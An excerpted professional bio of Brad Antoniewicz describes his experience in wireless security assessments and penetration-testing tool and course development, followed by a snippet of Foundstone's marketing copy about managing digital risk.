Antoniewicz has over seven years of experience within information technology ... 802.11 wireless assessments ... Brad has also developed internal tools for internal/external/wireless penetration testing and courseware for the “Ultimate Hacking: Wireless Course” ... Inc ... Through a strategic approach to security, Foundstone identifies and implements the right balance of technology, people, and process to manage digital risk and leverage security investments more effectively ...